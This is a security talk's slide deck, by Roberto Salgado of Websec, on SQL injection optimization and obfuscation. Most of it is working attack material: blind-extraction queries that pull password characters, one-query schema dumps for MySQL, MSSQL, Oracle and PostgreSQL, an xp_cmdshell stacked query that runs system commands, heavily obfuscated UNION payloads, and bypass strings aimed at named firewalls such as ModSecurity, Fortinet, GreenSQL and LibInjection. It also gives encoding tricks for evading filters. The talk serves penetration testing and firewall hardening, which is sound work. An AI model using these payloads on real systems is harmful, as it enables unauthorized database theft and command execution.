) UNION SELECT `This_Talk` AS ('New Optimization and Obfuscation Techniques)%00
Roberto Salgado
- Co-founder of Websec: information security solutions (pen-testing, training and monitoring)
- Creator of The SQL Injection KB
- Pythonista / Security Researcher
Contact
- [email protected]
- http://www.websec.ca
- http://www.twitter.com/@LightOS
Overview
- Optimization: analysis of blind SQLi methods, optimized queries
- Obfuscation: fuzzers, bypassing firewalls, fun with encodings
- Leapfrog: SQLi, LFI, XSS
Exploits of a mom
- How to prevent SQL injections?
- http://www.bobby-tables.com
- http://xkcd.com/327/
OPTIMIZATION
OPTIMIZATION Intro
Why do we care?
http://xkcd.com/85/
OPTIMIZATION Blind SQL Injections
Analysis of methods:
- Bisection method
- Regex method
- Bitwise methods
- Binary to position (Bin2Pos)
OPTIMIZATION Blind SQL Injections
Quick reminder:
- We can only retrieve 1 character at a time
- We test whether we have the correct character by telling the True and False responses apart
Example:
SELECT * FROM users WHERE id=1 AND 1=1
SELECT * FROM users WHERE id=1 AND 1=2
OPTIMIZATION ASCII Table
Each ASCII character can be represented in 1 byte, or 8 bits.

Character | Binary (base 2) | Octal (base 8) | Decimal (base 10) | Hexadecimal (base 16)
a         | 01100001        | 141            | 97                | 61

OPTIMIZATION ASCII Table
The 8th bit of the ASCII characters we're interested in is always 0.

Decimal     | 0        | 127      | 255
Hexadecimal | 00       | 7F       | FF
Binary      | 00000000 | 01111111 | 11111111

The range we're interested in:

Decimal     | 0        | 127
Hexadecimal | 00       | 7F
Binary      | 00000000 | 01111111
OPTIMIZATION Bisection Method
- Binary search algorithm
- ASCII range 32-126
- Split in half: (32 + 126) / 2 = 79
- Is the value greater or lesser?
- Split the result in half again and repeat

OPTIMIZATION Bisection Method
a = 97 decimal. Each request asks whether the value lies in the lower half of the current range; the midpoint is rounded when the range has an odd size.

Step | Range    | Midpoint                 | Question                   | Response
1    | 32-126   | (32 + 126) / 2 = 79      | 97 between 32 and 79?      | False
2    | 79-126   | (79 + 126) / 2 = 102.5   | 97 between 79 and 103?     | True
3    | 79-103   | (79 + 103) / 2 = 91      | 97 between 79 and 91?      | False
4    | 91-103   | (91 + 103) / 2 = 97      | 97 between 91 and 97?      | True
5    | 91-97    | (91 + 97) / 2 = 94       | 97 between 91 and 94?      | False
6    | 94-97    | (94 + 97) / 2 = 95.5     | 97 between 94 and 96?      | False
7    | 96-97    |                          | 97 == 97? (97 != 96)       | True

Seven requests for 'a'; a different character can finish one step earlier, which is where the 6-7 requests per character below come from.

OPTIMIZATION Bisection Method
Binary search tree:
1,2,3,4,5,6,7,8
  1,2,3,4          5,6,7,8
  1,2     3,4      5,6     7,8

OPTIMIZATION Bisection Method
Bisection method
Pros:
- Logarithmic: log2(N)
- Divide-and-conquer algorithm
- 6-7 RPC (requests per character)
Cons:
- Same average case / worst case scenario
OPTIMIZATION Regex Method
Regex method - by Simone 'R00T_ATI' Quatrini and Marco 'white_sheep' Rondini

Request         | Response
REGEXP '^[a-z]' | True
REGEXP '^[a-n]' | True
REGEXP '^[a-g]' | False
REGEXP '^[h-n]' | True
REGEXP '^[h-l]' | False

OPTIMIZATION Regex Method
Regex method - by Simone 'R00T_ATI' Quatrini and Marco 'white_sheep' Rondini
Pros:
- No need to convert to decimal
- Bisection method on REGEX
Cons:
- Same amount of requests as bisection
OPTIMIZATION Bitwise Methods
- Each ASCII character can be represented in 1 byte, or 8 bits
- The MSB of the ASCII range of characters we're interested in is always 0
- The amount of requests will therefore always be 7

OPTIMIZATION Bitwise Methods
"Faster Blind MySQL Injection Using Bit Shifting" - by Jelmer de Hen
a = 97 dec = 01100001
Each shift exposes one more bit, so the next result can only be one of two values: the previous result with a 0 or a 1 appended.

Request | Possible results  | Actual | New bit
97 >> 7 | 0 or 1            | 0      | 0
97 >> 6 | 0 or 1 (0b0?)     | 1      | 1
97 >> 5 | 2 or 3 (0b01?)    | 3      | 1
97 >> 4 | 6 or 7 (0b011?)   | 6      | 0

OPTIMIZATION Bitwise Methods
"Faster Blind MySQL Injection Using Bit Shifting" - by Jelmer de Hen
Pros:
- The amount of requests is consistent
Cons:
- Always uses 7 RPC
- Weird implementation
- No threading (each request depends on the previous result)

OPTIMIZATION Bitwise Methods
"Faster Blind MySQL Injection Using Bit Shifting" - my variation

01100001 >> 7 = 00000000 = 0
01100001 >> 6 = 00000001 = 1
01100001 >> 5 = 00000011 = 3
01100001 >> 4 = 00000110 = 6
01100001 >> 3 = 00001100 = 12
01100001 >> 2 = 00011000 = 24
01100001 >> 1 = 00110000 = 48
01100001 >> 0 = 01100001 = 97

OPTIMIZATION Bitwise Methods
"Faster Blind MySQL Injection Using Bit Shifting" - my variation
a = 97 dec = 01100001

Request                 | Possible | Actual
substr(bin(97>>7),-1,1) | 1 or 0   | 0
substr(bin(97>>6),-1,1) | 1 or 0   | 1
substr(bin(97>>5),-1,1) | 1 or 0   | 1
substr(bin(97>>4),-1,1) | 1 or 0   | 0

Asking only for the last binary digit of each shifted value makes every request an independent True/False test, so the 7 requests can be sent in parallel.

OPTIMIZATION Bitwise Methods
"Faster Blind MySQL Injection Using Bit Shifting" - my variation
Pros:
- The amount of requests is consistent
- Threading
Cons:
- Always uses 7 RPC
"Bit ANDing" - By Ruben Ventura a
=
97
dec
=
01100001
97
&
1
97
&
2
97
&
4
97
&
8
00000001
00000010
00000100
00001000
OPTIMIZATION Bitwise Methods
"Bit ANDing" - By Ruben Ventura a
=
97
dec
=
01100001
97
&
1
97
&
2
97
&
4
97
&
8
00000001
00000010
00000100
00001000
1
OPTIMIZATION Bitwise Methods
"Bit ANDing" - By Ruben Ventura a
=
97
dec
=
01100001
97
&
1
97
&
2
97
&
4
97
&
8
00000001
00000010
00000100
00001000
1
0
OPTIMIZATION Bitwise Methods
"Bit ANDing" - By Ruben Ventura a
=
97
dec
=
01100001
97
&
1
97
&
2
97
&
4
97
&
8
00000001
00000010
00000100
00001000
1
0
0
OPTIMIZATION Bitwise Methods
"Bit ANDing" - By Ruben Ventura a
=
97
dec
=
01100001
97
&
1
97
&
2
97
&
4
97
&
8
00000001
00000010
00000100
00001000
1
0
0
0
OPTIMIZATION Bitwise Methods
"Bit ANDing" - By Ruben Ventura a
=
97
dec
=
01100001
97
&
1
97
&
2
97
&
4
97
&
8
00000001
00000010
00000100
00001000
1
0
0
0
OPTIMIZATION Bitwise Methods
"Bit ANDing" - By Ruben Ventura Pros:
The
amount
of
requests
is
consistent
Threading
Cons:
Always
uses
7
RPC
OPTIMIZATION Bin2Pos Method
- Requires a set of possible characters (32-126 decimal)
- The closer the char is to the beginning of the set, the fewer requests are required
- We can arrange the set of characters by most common letters

OPTIMIZATION Bin2Pos Method
- Map the character to its position in the set
- Convert this position to binary
- Now we have reduced the characters we have to look for to 2 (0 and 1)

OPTIMIZATION Bin2Pos Method
Our set (without capitals):
abcdefghijklmnopqrstuvwxyz_0123456789,.<>/?;:\'"[{]}\|=+-) (*&^%$#@!`~
A hex set:
0123456789ABCDEF
BIN(1) = 1
BIN(94) = 1011110
The largest set has 94 positions, so a position never needs more than 7 binary digits.

OPTIMIZATION Bin2Pos Method
IF((@a:=MID(BIN(POSITION(MID((SELECT password FROM users WHERE id=2 LIMIT 1),1,1) IN (CHAR(48,49,50,51,52,53,54,55,56,57,65,66,67,68,69,70))),1,1))!=space(0),2-@a,0/0)

CHAR(48..57,65..70) is the hex set above. The injected value resolves to one of three things: 1 when the requested binary digit is '1' (2-@a), 2 when it is '0', and NULL (0/0) when the digit does not exist, so the attacker needs to tell apart the responses for two different parameter values as well as the empty/error response.

OPTIMIZATION Bin2Pos Method
LOWERCASE_SET = (a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,0,1,2,3,4,5,6,7,8,9,_,!,@,#,$,%,^,&,*,(,),-,+,=,\,,.,\",',~,`,\\,|,{,},[,],:,;, )

OPTIMIZATION Bin2Pos Method
- C is the 3rd position in the set, which equals 11 in binary
- Our request starts with the first "on" bit; therefore the first digit will always be 1

OPTIMIZATION Bin2Pos Method
Retrieving 11:
- We know the first digit is 1: no request required
- Is the second digit 1? True
- Is the third digit 1? False, there is no third digit
- Total requests required for C: 2

OPTIMIZATION Bin2Pos Method
Taking it a step further
- The most common first letter in a word, in order of frequency: T, O, A, W, B, C, D, S, F, M, R, H, I, Y, E, G, L, N, O, U, J, K
- Letters most likely to follow E, in order of frequency: R, S, N, D
- The most common digraphs, in order of frequency: TH, HE, AN, IN, ER, ON, RE, ED, ND, HA, AT, EN, ES, OF, NT, EA, TI, TO, IO, LE, IS, OU, AR, AS, DE, RT, VE
- The most common trigraphs, in order of frequency: THE, AND, THA, ENT, ION, TIO, FOR, NDE, HAS, NCE, TIS, OFT, MEN
http://scottbryce.com/cryptograms/stats.htm

OPTIMIZATION Bin2Pos Method
Pros:
- Only 1-6 RPC
- No matter the size of the set, RPC will always be less than bisection
Cons:
- Requires 2 different parameter values
OPTIMIZATION Bin2Pos Method
Comparison of methods: total requests needed to extract each string (values as read from the chart; Bitwise is 7 per character).

String                                      | Bisection | Bitwise | Bin2Pos | Bin2Pos saving vs bisection
CHARACTER_SET                               | 88        | 91      | 47      | 47%
MD5('ABC123')                               | 147       | 224     | 105     | 29%
THE QUICK BROWN FOX JUMPS OVER THE LAZY DOG | 292       | 301     | 189     | 35%

OPTIMIZATION Method Comparison
DEMO
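The request counts in the bisection, bit-shifting/bit-ANDing and Bin2Pos slides above can be reproduced offline. The following is an added example, not code from the original slides: a Python oracle stands in for the injectable query, each ask() is one HTTP request whose True/False (or error) page the attacker observes, and the three methods are run against the same strings so their totals can be compared. LOWERCASE_SET is a reconstruction of the slide's "set without capitals" (the exact ordering changes the Bin2Pos counts), and the sample strings are constructed inputs.

```python
"""Request counts of the blind-SQLi extraction methods, with a simulated oracle.

Added example (not code from the original slides). Oracle stands in for the
injectable query: each ask() is one HTTP request whose True/False page, or
error page, the attacker observes. LOWERCASE_SET is a reconstruction of the
slide's "set without capitals"; the exact ordering changes Bin2Pos counts.
"""
import hashlib
import string

LOWERCASE_SET = (string.ascii_lowercase + "_" + string.digits
                 + ",.<>/?;:'\"[{]}\\|=+-) (*&^%$#@!`~")
HEX_SET = "0123456789abcdef"


class Oracle:
    """The target's answers; counts every question so methods can be compared."""

    def __init__(self, secret):
        self._secret = secret
        self.requests = 0

    def ask(self, question):
        self.requests += 1
        return question(self._secret)


def bisection(oracle, pos, lo=32, hi=126):
    """Binary search over printable ASCII: 6 or 7 requests per character."""
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle.ask(lambda s: ord(s[pos]) > mid):
            lo = mid + 1
        else:
            hi = mid
    return chr(lo)


def bitshift(oracle, pos):
    """One request per bit; bit 7 of printable ASCII is always 0, so 7 requests.

    Mirrors substr(bin(ord(c) >> k), -1, 1) from the slides. Bit ANDing
    (ord(c) & 2**k) asks the same question with a mask instead of a shift.
    Every request is independent of the others, so they can be threaded.
    """
    value = 0
    for k in range(6, -1, -1):
        if oracle.ask(lambda s: (ord(s[pos]) >> k) & 1 == 1):
            value |= 1 << k
    return chr(value)


def bin2pos(oracle, pos, charset):
    """Recover BIN(POSITION(c IN charset)) one digit at a time.

    Each request has three outcomes: digit '1', digit '0', or None when the
    digit does not exist (the slide's 0/0). The leading digit of a position
    >= 1 is always 1, so it costs nothing; the loop stops at the first missing
    digit or once every possible digit is known. A character outside charset
    raises ValueError, the simulated form of an inconsistent response.
    """
    maxbits = len(charset).bit_length()

    def digit(secret, i):
        b = bin(charset.index(secret[pos]) + 1)[2:]   # POSITION() is 1-based
        return b[i - 1] if i <= len(b) else None

    bits = "1"
    for i in range(2, maxbits + 1):
        d = oracle.ask(lambda s, i=i: digit(s, i))
        if d is None:
            break
        bits += d
    return charset[int(bits, 2) - 1]


def extract(secret, method, **kw):
    """Pull the whole secret out character by character: (text, request count)."""
    oracle = Oracle(secret)
    text = "".join(method(oracle, i, **kw) for i in range(len(secret)))
    return text, oracle.requests


def compare(secret, charset=LOWERCASE_SET):
    return {"bisection": extract(secret, bisection),
            "bitshift": extract(secret, bitshift),
            "bin2pos": extract(secret, bin2pos, charset=charset)}


if __name__ == "__main__":
    samples = [("character_set", LOWERCASE_SET),             # constructed inputs
               ("the quick brown fox jumps over the lazy dog", LOWERCASE_SET),
               (hashlib.md5(b"ABC123").hexdigest(), HEX_SET)]
    for text, cs in samples:
        for name, (got, n) in compare(text, cs).items():
            assert got == text
            print(f"{name:10s} {n:4d} requests  {text!r}")
```

Bitwise always costs exactly 7 per character (91 for the 13-character string, 301 for the 43-character sentence, matching the chart), bisection 6-7, and Bin2Pos depends only on how early each character sits in the set: with the hex set a position needs at most 5 digits, so no hex character costs more than 4 requests.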
OPTIMIZING QUERIES
OPTIMIZING QUERIES Data Extraction
Retrieve all databases, tables and columns with just one query.

OPTIMIZING QUERIES MySQL - by Ionut Maroiu
SELECT (@) FROM (SELECT(@:=0x00),(SELECT (@) FROM (information_schema.columns) WHERE (table_schema>=@) AND (@)IN (@:=CONCAT(@,0x0a,'[ ',table_schema,' ] > ',table_name,' > ',column_name))))x

OPTIMIZING QUERIES MySQL - Demo
Demo

OPTIMIZING QUERIES MSSQL - by Daniel Kachakil
SELECT table_name + ', ' FROM information_schema.tables FOR XML PATH('')

OPTIMIZING QUERIES Oracle
SELECT RTRIM(XMLAGG(XMLELEMENT(e, table_name || ',')).EXTRACT('//text()').EXTRACT('//text()'), ',') FROM all_tables

OPTIMIZING QUERIES PostgreSQL - by Dmitriy Serebryannikov
SELECT array_to_json(array_agg(tables))::text FROM (SELECT schemaname, relname FROM pg_stat_user_tables) AS tables LIMIT 1
OPTIMIZING QUERIES MSSQL One query for RCE
- Check to see if xp_cmdshell is loaded
- If loaded, check if it is enabled
- Run the 'dir' command and store the results in TMP_DB

OPTIMIZING QUERIES MSSQL
Shown as sent in the URL: %23 is '#' (temporary table prefix) and %2B is '+' (string concatenation).

' IF EXISTS (SELECT 1 FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME='TMP_DB') DROP TABLE TMP_DB
DECLARE @a varchar(8000)
IF EXISTS(SELECT * FROM dbo.sysobjects WHERE id = object_id(N'[dbo].[xp_cmdshell]') AND OBJECTPROPERTY(id, N'IsExtendedProc') = 1)
BEGIN
  CREATE TABLE %23xp_cmdshell (name nvarchar(11), min int, max int, config_value int, run_value int)
  INSERT %23xp_cmdshell EXEC master..sp_configure 'xp_cmdshell'
  IF EXISTS (SELECT * FROM %23xp_cmdshell WHERE config_value=1)
  BEGIN
    CREATE TABLE %23Data (dir varchar(8000))
    INSERT %23Data EXEC master..xp_cmdshell 'dir'
    SELECT @a=''
    SELECT @a=Replace(@a %2B'<br></font><font color="black">'%2Bdir,'<dir>','</font><font color="orange">') FROM %23Data WHERE dir>@a
    DROP TABLE %23Data
  END
  ELSE SELECT @a='xp_cmdshell not enabled'
  DROP TABLE %23xp_cmdshell
END
ELSE SELECT @a='xp_cmdshell not found'
SELECT @a AS tbl INTO TMP_DB--

OPTIMIZING QUERIES MSSQL - Demo
Demo
OPTIMIZING QUERIES More Single Liners
- Testing can become tedious
- Injections can use single, double or no quotations at all
- 400+ parameters/module
- 3 separate tests for each variation:
  OR 1=1
  OR '1'='1
  OR "1"="1

OPTIMIZING QUERIES More Single Liners
How about fusing them?
- OR 1#"OR"'OR''='"="'OR''='
One payload that evaluates to true in all three contexts:
- No quotations: the query reads ... OR 1 and the # comments out the rest
- Double quotations: the value closes the string, then "'OR''='"="'OR''='" compares two identical strings
- Single quotations: the value closes the string after "OR", then ''='"="' OR ''='' ends with an always-true comparison

OPTIMIZING QUERIES More Single Liners
What about ANDing?
- !=0--+"!="'!='
Again one payload for all three contexts (the + becomes a space, which MySQL requires after --):
- No quotations: 1!=0 is true and -- comments out the rest
- Double quotations: "1!=0--+"!="'!='" compares two different strings
- Single quotations: '1!=0--+"!="'!='' compares a non-empty string with an empty one
OBFUSCATION
OBFUSCATION What is it?
http://wellington.pm.org/archive/200704/simple_obfu/images/obfuscation_02.png

OBFUSCATION How to confuse an admin
UNION select@0o0oOOO0Oo0OOooOooOoO00Oooo0o0oOO $ fRom(SeLEct@0o0oOOO0Oo0OOooOooOoO00Oooo0o0oOO frOM`information_schema`.`triggers`)0o0oOOO0Oo0OOooOooOoO00Oooo0o0oOO WHere !FAlSE||tRue&&FalSe||FalsE&&TrUE like TruE||FalSE
union/*! 98765select@000OO0O0OooOoO0OOoooOOoOooo0o0o:=grOup_cONcaT(`username`)``from(users)whErE(username)like'admin'limit 1*/select@000OO0O0OooOoO0OOoooO0oOooo0o0o limit 1,0
UnION SeleCt(selEct(sELecT/*! 67890sELect@000OO0O0O0oOoO0OOoooOOoOooo0o0o:=group_concat(`table_name`)FrOM information_schema.statistics WhERE TABLe_SCHEmA In(database())*//*!@000OO0O0OooOoO0OOoooO0oOooo0o0o:=gROup_conCat(/*!taBLe_naME)*/fRoM information_schema.partitions where TABLe_SCHEma not in(concat((select insert(insert((select (collation_name)from(information_schema.collations)where(id)=true+true),true,floor(pi()),trim(version()from(@@version))),floor(pi()),ceil(pi()*pi()),space(0))), conv((125364/(true-!true))-42351, ceil(pi()*pi()),floor(pow(pi(),pi()))),mid(aes_decrypt(aes_encrypt(0x6175746F6D6174696F6E,0x4C696768744F53),0x4C696768744F53)FROM floor(version()) FOR ceil(version())),rpad(reverse(lpad(collation(user()),ceil(pi())--@@log_bin,0x00)),!!true,0x00),CHAR((ceil(pi())+!false)*ceil((pi()+ceil(pi()))*pi()),(ceil(pi()*pi())*ceil(pi()*pi()))--cos(pi()),(ceil(pi()*pi())*ceil(pi()*pi()))-- ceil(pi()),(ceil(pi()*pi())*ceil(pi()*pi()))-cos(pi()),(ceil(pi()*pi())*ceil(pi()*pi()))--floor(pi()*pi()),(ceil(pi()*pi())*ceil(pi()*pi()))-floor(pi()))),0x6d7973716c))from(select--(select~0x7))0o0oOOO0Oo0OOooOooOoO00Oooo0o0oO)from(select@/*!/*!$*/from(select+3.``)000oOOO0Oo0OOooOooOoO00Oooo0o0oO)0o0oOOO0Oo0OOooOooOoO00Oooo0o0oO/*! 76799sElect@000OO0O0OooOoO00Oooo0OoOooo0o0o:=group_concat(`user`)``from`mysql.user`WHeRe(user)=0x726f6f74*/ #(SeLECT@
uNioN sElEcT AlL group_concat(cOLumN_nAME,1,1)FroM InFoRMaTioN_ScHemA.COLUMNS where taBle_scHema not in(0x696e666f726d6174696f6e5f736368656d61,0x6d7973716c)UNION SELECT@0o0oOOO0Oo0OOooOooOoO00Oooo0o0oOO UNION SELECT@0o0oOOO0Oo0OOooOooOoO00Oooo0o0oOO UNION SELECT@000OO0O0OooOoO0OOoooO0oOooo0o0oOO UNION SELECT@0o0oOOO0Oo0OOooOooOoO00Oooo0o0oOO)
BYPASSING FIREWALLS
BYPASSING FIREWALLS General Tips
- Read the documentation for unexpected behavior and oddities
- Learn what the DBMS is capable of and what it can handle
- Fuzzers can help find undocumented oddities
- Be creative!
OBFUSCATION Simple PHP Fuzzer
<?php
// Try every byte between "1" and "=1" and report the ones MySQL still
// accepts, i.e. the bytes usable as separators in that position.
// (mysqli replaces the removed mysql_* extension of the original.)
$link = mysqli_connect('localhost', 'root', '');
for ($i = 0; $i <= 255; $i++) {
    $query = mysqli_query($link, "SELECT 1 FROM dual WHERE 1" . chr($i) . "=1");
    if (!$query) {
        continue;   // syntax error: this byte is not accepted here
    }
    echo $i . ':0x' . dechex($i) . ':' . chr($i) . '<br>';
}
?>
OBFUSCATION Simple Python Fuzzer
import warnings
import MySQLdb


def main():
    warnings.simplefilter("ignore")   # silence MySQLdb warnings on odd queries
    db = MySQLdb.connect(host="localhost", user="root", passwd="", db="test", port=1337)
    cursor = db.cursor()
    # Try every byte as the separator between FROM and the table name
    for a in range(256):
        try:
            cursor.execute("SELECT 1 FROM%susers WHERE 1=1 limit 1" % chr(a))
            print("a:%d:%s:%s" % (a, hex(a), chr(a) if a != 10 else "NEW LINE"))
        except MySQLdb.Error:
            cursor = db.cursor()   # a failed statement can leave the cursor unusable
            continue


if __name__ == "__main__":
    main()
OBFUSCATION Allowed Whitespaces
SQLite3
- 0A, 0D, 0C, 09, 20
MySQL 5
- 09, 0A, 0B, 0C, 0D, A0, 20
MySQL 3
- 01, 02, 03, 04, 05, 06, 07, 08, 09, 0A, 0B, 0C, 0D, 0E, 0F, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 1A, 1B, 1C, 1D, 1E, 1F, 20, 7F, 80, 81, 88, 8D, 8F, 90, 98, 9D, A0

OBFUSCATION Allowed Whitespaces
PostgreSQL
- 0A, 0D, 0C, 09, 20
Oracle 11g
- 00, 0A, 0D, 0C, 09, 20
MSSQL
- 01, 02, 03, 04, 05, 06, 07, 08, 09, 0A, 0B, 0C, 0D, 0E, 0F, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 1A, 1B, 1C, 1D, 1E, 1F, 20

OBFUSCATION Allowed Whitespaces
SELECT*FROMusersWHERE1=1
(with one of the accepted whitespace bytes, invisible here, between the keywords)
BYPASSING FIREWALLS MySQL Obfuscation
1.UNION SELECT 2
3.2UNION SELECT 2
1e0UNION SELECT 2
SELECT\N/0.e3UNION SELECT 2
1e1AND-0.0UNION SELECT 2
1/*!12345UNION/*!31337SELECT/*!table_name*/
{ts 1}UNION SELECT.`` 1.e.table_name
SELECT $.`` 1.e.table_name
SELECT{_ .``1.e.table_name}
SELECT LightOS . ``1.e.table_name LightOS
SELECT information_schema 1337.e.tables 13.37e.table_name
SELECT 1 from information_schema 9.e.table_name

BYPASSING FIREWALLS MSSQL Obfuscation
.1UNION SELECT 2
1.UNION SELECT.2alias
1e0UNION SELECT 2
1e1AND-1=0.0UNION SELECT 2
SELECT 0xUNION SELECT 2
SELECT\UNION SELECT 2
\1UNION SELECT 2
SELECT 1FROM[table]WHERE\1=\1AND\1=\1
SELECT"table_name"FROM[information_schema].[tables]

BYPASSING FIREWALLS Oracle Obfuscation
1FUNION SELECT 2
1DUNION SELECT 2
SELECT 0x7461626c655f6e616d65 FROM all_tab_tables
SELECT CHR(116) || CHR(97) || CHR(98) FROM all_tab_tables
SELECT%00table_name%00FROM%00all_tab_tables

BYPASSING FIREWALLS General Tips
Don't start with something obvious:
- 1 UNION SELECT GROUP_CONCAT(TABLE_NAME) FROM INFORMATION_SCHEMA.TABLES
Instead, keep it simple!
- CASE WHEN BINARY TRUE THEN TRUE END IS NOT UNKNOWN HAVING TRUE FOR UPDATE
BYPASSING FIREWALLS - SQLi Obfuscation
Modsecurity
-2 div 1 union all #in #between comments
#in #between comments
select 0x00, 0x41 like/*!31337table_name*/,3 from information_schema.tables limit 1

BYPASSING FIREWALLS - SQLi Obfuscation
Modsecurity
CASE WHEN BINARY TRUE THEN TRUE END IS UNKNOWN FOR UPDATE UNION SELECT
MATTRESSES 1 MOD 0.2UNION%A0SELECT 1,current_user,3

BYPASSING FIREWALLS - SQLi Obfuscation
Fortinet
S%A0E%B1L%C2E%D3C%E4T%F6 1
U%FFNION SEL%FFECT 2

BYPASSING FIREWALLS - SQLi Obfuscation
GreenSQL
-1 UNION SELECT table_name FROM information_schema.tables limit 1
1 AND 1=0 UNION SELECT table_name FROM information_schema.tables limit 1
1 AND 1=0.e1 UNION SELECT table_name FROM information_schema.tables limit 1
1 AND 1= binary 1 UNION SELECT table_name FROM information_schema.tables limit 1
IF((SELECT mid(table_name,1,1) FROM information_schema.tables limit 1)=C,1,2)

BYPASSING FIREWALLS - SQLi Obfuscation
GreenSQL

BYPASSING FIREWALLS - SQLi Obfuscation
LibInjection
-1 UNION SELECT table_name Websec FROM information_schema.tables LIMIT 1
-1 UNION%0ASELECT table_name FROM information_schema.tables LIMIT 1
-1fUNION SELECT column FROM table
1; DECLARE @test AS varchar(20); EXEC master.dbo.xp_cmdshell 'cmd'
-[id] UNION SELECT table_name FROM information_schema.tables LIMIT 1
{d 2} UNION SELECT table_name FROM information_schema.tables LIMIT 1

BYPASSING FIREWALLS - SQLi Obfuscation
LibInjection
1 between 1 AND`id` having 0 union select table_name from information_schema.tables
1 mod /*!1*/ union select table_name from information_schema.tables--
true is not unknown for update union select table_name from information_schema.tables
test'-1/1/**/union(select table_name from information_schema.tables limit 1,1)
-1 union select @``"", table_name from information_schema.tables
-1 LOCK IN SHARE MODE UNION SELECT table_name from information_schema.tables
$.``.id and 0 union select table_name from information_schema.tables
-(select @) is unknown having 1 UNION select table_name from information_schema.tables
/*!911111*//*!0*/union select table_name x from information_schema.tables limit 1
-1.for update union select table_name from information_schema.tables limit 1
-0b01 union select table_name from information_schema.tables limit 1
1<binary 1>2 union select table_name from information_schema.tables limit 1
-1 procedure analyse(1gfsdgfds, sfg) union select table_name from information_schema.tables limit 1
BYPASSING FIREWALLS Encodings
- URL encode
- Double URL encode
- Unicode encode
- UTF-8 multi-byte encode
- First nibble
- Second nibble
- Double nibble
- Invalid percent encode
- Invalid hex encode
BYPASSING FIREWALLS Encodings URL Encode
- URL encoding is used to transform special characters so they can be sent over HTTP
- Characters get transformed to their hexadecimal equivalent, prefixed with a percent sign
- a = %61

BYPASSING FIREWALLS Encodings Double URL Encode
- Double URL encoding is the process of re-encoding the percent sign
- a = %61
- %61 = %2561

BYPASSING FIREWALLS Encodings URL Encode / Weak Firewall
Description of the SQLMAP tamper script charencode, used to URL encode the request:
"Useful to bypass very weak web application firewalls that do not url-decode the request before processing it through their ruleset"

BYPASSING FIREWALLS Encodings URL Encode / Weak Firewall
Demo

BYPASSING FIREWALLS Encodings Unicode
- Similar to URL encoding, however the hex value is prefixed with %u and padded to four digits (%u00xx for ASCII)
- Supported by IIS
- a = %61
- %61 = %u0061
BYPASSING FIREWALLS Encodings UTF-8 Multi-byte
- The leading bits of the first byte, up to the first 0, give the total number of bytes in the sequence
- The bits after the first 0 in the first byte form part of the character
- Each following byte has 10 in the high-order position; these two bits carry no character data, so a lenient decoder can ignore them

BYPASSING FIREWALLS Encodings UTF-8 Multi-byte

Bytes in sequence | Byte 1   | Byte 2   | Byte 3   | Byte 4   | Byte 5   | Byte 6
1                 | 0xxxxxxx |          |          |          |          |
2                 | 110xxxxx | 10xxxxxx |          |          |          |
3                 | 1110xxxx | 10xxxxxx | 10xxxxxx |          |          |
4                 | 11110xxx | 10xxxxxx | 10xxxxxx | 10xxxxxx |          |
5                 | 111110xx | 10xxxxxx | 10xxxxxx | 10xxxxxx | 10xxxxxx |
6                 | 1111110x | 10xxxxxx | 10xxxxxx | 10xxxxxx | 10xxxxxx | 10xxxxxx

BYPASSING FIREWALLS Encodings UTF-8 Multi-byte

Byte sequence   | Character a encoded | First two high-order bits of the continuation byte
2 byte sequence | %c1%a1              | 10
2 byte sequence | %c1%21              | 00
2 byte sequence | %c1%61              | 01
2 byte sequence | %c1%e1              | 11
3 byte sequence | %e0%81%a1           | 10
BYPASSING FIREWALLS Encodings Nibble
- A nibble is 4 bits
- One nibble represents a hex digit (2^4 = 16)
- Two nibbles, or an octet, represent one byte written as two hex digits

BYPASSING FIREWALLS Encodings Nibble

Hex | Decimal | Octal | Binary
0   | 0       | 0     | 0000
1   | 1       | 1     | 0001
2   | 2       | 2     | 0010
3   | 3       | 3     | 0011
4   | 4       | 4     | 0100
5   | 5       | 5     | 0101
6   | 6       | 6     | 0110
7   | 7       | 7     | 0111
8   | 8       | 10    | 1000
9   | 9       | 11    | 1001
A   | 10      | 12    | 1010
B   | 11      | 13    | 1011
C   | 12      | 14    | 1100
D   | 13      | 15    | 1101
E   | 14      | 16    | 1110
F   | 15      | 17    | 1111

BYPASSING FIREWALLS Encodings First Nibble
The hex digit for the first 4 (leading) bits is URL-encoded again:
- a = %61
- 6 = %36
- %%361

BYPASSING FIREWALLS Encodings Second Nibble
The hex digit for the last 4 bits is URL-encoded again:
- a = %61
- 1 = %31
- %6%31

BYPASSING FIREWALLS Encodings Double Nibble
Combination of first nibble + second nibble encoding:
- a = %61
- 6 = %36
- 1 = %31
- %%36%31

All three only work when the server decodes the parameter twice (or recursively) while the WAF decodes it once, since after a single pass they still read %61 rather than a.

BYPASSING FIREWALLS Encodings Invalid Percent
IIS removes the percent sign when it is not followed by valid hex.
The WAF receives:
%SE%LE%CT %1 %F%R%%%%%OM %TA%B%L%E%
However, IIS reads it as:
SELECT 1 FROM TABLE

BYPASSING FIREWALLS Encodings Invalid Hex
Create invalid hex that results in the same decimal value as valid hex:
- a = %61
- %61 = 6 * 16 + 1 = 97
- %2 followed by a "digit" the lenient decoder values at 65 = 2 * 16 + 65 = 97
- That pair is the same as %61

BYPASSING FIREWALLS Encodings Invalid Hex
A lenient decoder keeps counting past F, so G and H act as the digits 16 and 17:

Decimal     | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17
Valid hex   | 0A | 0B | 0C | 0D | 0E | 0F | 10 | 11
Invalid hex | 0A | 0B | 0C | 0D | 0E | 0F | 0G | 0H
LEAPFROG
LEAPFROG What is it?
- A tool designed to harden your firewall
- Finds bypasses for different web attacks: SQLi, XSS, LFI, content filters
- Creates all its payloads dynamically
- Provides recommendations on successful bypasses
- Generates a score based on successful bypasses

LEAPFROG WAF Acceptance Factor
WAF Acceptance Factor is a score based on the amount of malicious requests detected.

LEAPFROG Wife Acceptance Factor
Wife Acceptance Factor, borrowed from: http://en.wikipedia.org/wiki/Wife_acceptance_factor

DEMO
THE END
THE END Contact Information
www.WEBSEC.ca